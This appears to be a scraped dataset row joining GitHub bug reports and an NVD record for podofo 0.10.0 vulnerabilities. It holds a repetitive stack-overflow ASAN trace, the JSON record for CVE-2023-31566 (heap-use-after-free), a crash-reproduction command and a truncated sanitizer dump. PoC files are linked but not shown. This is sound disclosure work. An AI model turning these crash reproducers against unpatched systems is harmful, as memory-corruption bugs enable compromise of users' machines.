#140 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#141 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#142 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#143 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#144 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#145 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#146 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#147 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#148 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#149 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#150 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#151 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#152 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#153 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#154 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#155 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#156 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#157 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#158 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#159 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#160 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#161 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#162 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#163 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#164 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#165 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#166 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#167 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#168 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#169 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#170 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#171 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#172 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#173 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#174 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#175 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#176 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#177 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#178 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#179 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#180 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#181 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#182 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#183 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#184 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#185 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#186 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#187 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#188 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#189 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#190 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#191 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#192 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#193 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#194 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#195 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#196 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#197 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#198 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#199 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#200 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#201 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#202 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#203 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#204 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#205 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#206 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#207 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#208 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#209 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#210 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#211 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#212 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#213 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#214 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#215 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#216 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#217 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#218 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#219 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#220 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#221 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#222 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#223 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#224 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#225 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#226 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#227 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#228 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#229 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#230 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#231 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#232 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#233 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#234 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#235 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#236 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#237 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#238 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#239 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#240 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#241 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#242 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#243 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#244 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#245 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#246 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#247 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#248 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
SUMMARY: AddressSanitizer: stack-overflow /root/test/fuzzing_python/llvm-project-llvmorg-12.0.0/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy
==2639991==ABORTING
```
**Environment**
- OS: Ubuntu 20.04.1
- clang:12.0.0
- podofo:0.10.0
we built podofo with AddressSanitizer (ASAN) .
`cmake -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_COMPILER=clang -DCMAKE_C_FLAGS="-O0 -fsanitize=address" -DCMAKE_CXX_FLAGS="-O0 -fsanitize=address"`
**1 Attachments**
[poc_file.zip](https://github.com/podofo/podofo/files/11192284/poc_file.zip)
| [podofo-0.10.0]Stack-Overflow | https://api.github.com/repos/podofo/podofo/issues/66/comments | 1 | 2023-04-10T17:05:40Z | 2023-04-12T22:17:02Z | https://github.com/podofo/podofo/issues/66 | 1,661,075,393 | 66 | 5,109 |
CVE-2023-31566 | 2023-05-10T16:15:12.567 | Podofo v0.10.0 was discovered to contain a heap-use-after-free via the component PoDoFo::PdfEncrypt::IsMetadataEncrypted(). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/podofo/podofo/issues/70"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/podofo/podofo/issues/70"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:podofo_project:podofo:0.10.0:-:*:*:*:*:*:*",
"matchCriteriaId": "E83D1F81-EBA4-47E8-BA9A-23EBABDB99BD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/podofo/podofo/issues/70 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"podofo",
"podofo"
] | We found a heap-use-after-free in podofo 0.10.0(main/PdfEncrypt.h:352:47 in PoDoFo::PdfEncrypt::IsMetadataEncrypted()).
**Command Input**
`podofoencrypt -rc4v2 -u 1232321 -o 24 poc_file /dev/null`
poc_file are attached.
**Sanitizer Dump**
```
==3903368==ERROR: AddressSanitizer: heap-use-after-free on address 0x613000000300 at pc 0x00000071995b bp 0x7ffffefd2300 sp 0x7ffffefd22f8
READ of size 1 at 0x613000000300 thread T0
#0 0x71995a in PoDoFo::PdfEncrypt::IsMetadataEncrypted() const /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfEncrypt.h:352:47
#1 0x717ec2 in PoDoFo::PdfParserObject::parseStream() /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfParserObject.cpp:219:45
#2 0x716a06 in PoDoFo::PdfParserObject::DelayedLoadStreamImpl() /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfParserObject.cpp:90:13
#3 0x69c223 in PoDoFo::PdfObject::delayedLoadStream() const /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfObject.cpp:359:35
#4 0x699211 in PoDoFo::PdfObject::DelayedLoadStream() const /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfObject.cpp:351:5
#5 0x69a130 in PoDoFo::PdfObject::Write(PoDoFo::OutputStream&, PoDoFo::PdfWriteFlags, PoDoFo::PdfEncrypt const*, PoDoFo::charbuff_t<void>&) const /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfObject.cpp:212:5
#6 0x756b85 in PoDoFo::PdfWriter::WritePdfObjects(PoDoFo::OutputStreamDevice&, PoDoFo::PdfIndirectObjectList const&, PoDoFo::PdfXRef&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfWriter.cpp:175:18
#7 0x753a27 in PoDoFo::PdfWriter::Write(PoDoFo::OutputStreamDevice&) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfWriter.cpp:97:9
#8 0x67467b in PoDoFo::PdfMemDocument::Save(PoDoFo::OutputStreamDevice&, PoDoFo::PdfSaveOptions) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:249:16
#9 0x67426f in PoDoFo::PdfMemDocument::Save(std::basic_string_view<char, std::char_traits<char> > const&, PoDoFo::PdfSaveOptions) /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfMemDocument.cpp:233:11
#10 0x4dfe62 in encrypt(std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, std::basic_string_view<char, std::char_traits<char> > const&, PoDoFo::PdfEncryptAlgorithm, PoDoFo::PdfPermissions) /root/target/Invariants/podofo-0.10.0/tools/podofoencrypt/podofoencrypt.cpp:49:9
#11 0x4e1112 in main /root/target/Invariants/podofo-0.10.0/tools/podofoencrypt/podofoencrypt.cpp:200:9
#12 0x7f70c1549082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#13 0x430f6d in _start (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofoencrypt+0x430f6d)
0x613000000300 is located 256 bytes inside of 352-byte region [0x613000000200,0x613000000360)
freed by thread T0 here:
#0 0x4ddb3d in operator delete(void*) /root/test/fuzzing_python/llvm-project-llvmorg-12.0.0/compiler-rt/lib/asan/asan_new_delete.cpp:160:3
#1 0x5c0821 in PoDoFo::PdfEncryptAESV3::~PdfEncryptAESV3() /root/target/Invariants/podofo-0.10.0/src/podofo/main/PdfEncrypt.h:623:7
#2 0x4e1cd6 in std::default_delete<PoDoFo::PdfEncrypt>::operator()(PoDoFo::PdfEncrypt*) const /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:81:2
#3 0x6778a7 in std::unique_ptr<PoDoFo::PdfEncrypt, std::default_delete<PoDoFo::PdfEncrypt> >::reset(PoDoFo::PdfEncrypt*) /usr/lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:402:4
